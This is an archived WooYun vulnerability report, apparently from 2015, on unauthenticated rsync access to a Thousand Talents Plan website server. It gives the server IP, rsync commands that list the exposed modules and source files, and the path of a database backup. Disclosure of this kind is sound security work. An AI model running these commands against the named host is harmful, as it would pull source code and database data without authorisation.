乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-02: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-04-16: 厂商已经主动忽略漏洞,细节向公众公开
千人计划某站点未授权访问可泄露源文件及数据库备份文件
服务器ip为211.151.58.236,rsync未授权访问,可读不可写,数据库配置为内网环境,无法远程访问未授权访问:
rsync 211.151.58.236:: 1000plan 1000plan source codetest testbackup-1000plan backup db && backup filevar-www-qrjh_zhb backup sourcevar-www-qrjh_zhb_data_upload backup data_upload
网站源文件:
rsync 211.151.58.236::1000plan drwxrwxr-x 4096 2015/01/16 19:14:27 .-rw-r--r-- 5000 2014/11/05 16:14:43 .htaccess-rwxr-xr-x 4998 2014/11/04 18:17:28 .htaccess.2014-11-rwxr-xr-x 4893 2014/11/04 18:09:42 .htaccess.bak-rwxrwxr-x 43360 2013/09/24 18:27:03 CHANGELOG.txt-rwxrwxr-x 988 2013/09/24 18:27:03 COPYRIGHT.txt-rwxrwxr-x 1924 2013/09/24 18:27:03 MAINTAINERS.txt-rwxrwxr-x 5002 2013/09/24 18:27:03 UPGRADE.txt-rwxrwxr-x 5810 2013/09/24 18:27:03 awstat.php-rwxrwxr-x 262 2013/09/24 18:27:03 cron.php-rwxrwxr-x 1406 2013/09/24 18:27:03 favicon.ico-rwxrwxr-x 2358 2013/09/24 18:27:03 index.htm-rwxrwxr-x 2637 2014/03/17 09:32:20 index.php-rwxrwxr-x 2665 2014/03/15 16:30:42 index.php.bak-rwxrwxr-x 7710 2013/09/24 18:27:03 login.htm-rwxrwxr-x 1490 2014/09/05 17:12:56 niu.html-rwxrwxr-x 1590 2013/09/24 18:27:03 robots.txt-rwxrwxr-x 266 2013/09/24 18:27:03 sitemap.xml-rwxrwxr-x 125 2013/09/24 18:27:03 temp.xml-rwxrwxr-x 30 2014/06/12 18:49:13 test.txt-rwxrwxr-x 25457 2013/09/24 18:27:03 update.php-rwxrwxr-x 32 2013/09/24 18:27:03 webscan_360_cn.html-rwxrwxr-x 352 2013/09/24 18:27:03 xmlrpc.phpdrwxrwxr-x 4096 2015/01/16 19:18:00 .svndrwxrwxr-x 4096 2013/09/24 18:27:03 Storagedrwxrwxr-x 4096 2015/02/28 17:41:27 chuangyedrwxrwxr-x 4096 2014/10/17 15:38:22 includedrwxrwxr-x 4096 2013/09/24 18:26:32 includesdrwxrwxr-x 4096 2013/09/24 18:26:23 jiancaidrwxrwxr-x 4096 2015/01/16 18:28:21 jsdrwxrwxr-x 4096 2013/09/24 18:26:20 lianyihuisitedrwxrwxr-x 4096 2013/09/24 18:26:59 miscdrwxrwxr-x 4096 2013/09/24 18:26:35 modulesdrwxrwxr-x 4096 2013/12/18 20:21:55 ocsdrwxrwxr-x 4096 2013/09/24 18:26:21 profilesdrwxrwxr-x 4096 2014/09/04 18:29:49 pushmaildrwxrwxr-x 4096 2013/09/24 18:26:22 scriptsdrwxrwxr-x 4096 2013/09/24 18:26:32 sitedrwxrwxr-x 4096 2013/09/24 18:26:39 sitesdrwxrwxr-x 4096 2013/09/24 18:26:21 themesdrwxrwxr-x 4096 2014/12/25 11:28:11 toolsdrwxrwxr-x 4096 2013/08/22 12:14:28 trunkdrwxrwxrwx 4096 2015/02/28 08:55:57 wikidrwxr-xr-x 4096 2015/01/16 19:14:50 wiki_bakdrwxrwxr-x 4096 2013/09/24 18:26:59 wiki_syndrwxr-xr-x 4096 2014/11/10 14:05:21 ycfwdrwxrwxr-x 4096 2013/09/24 18:26:32 zhaopin_testdrwxr-xr-x 4096 2014/12/29 11:36:27 zj
数据库备份文件:
rsync 211.151.58.236::backup-1000plan/qrjh_14120111.sql.back
如上
添加访问权限
未能联系到厂商或者厂商积极拒绝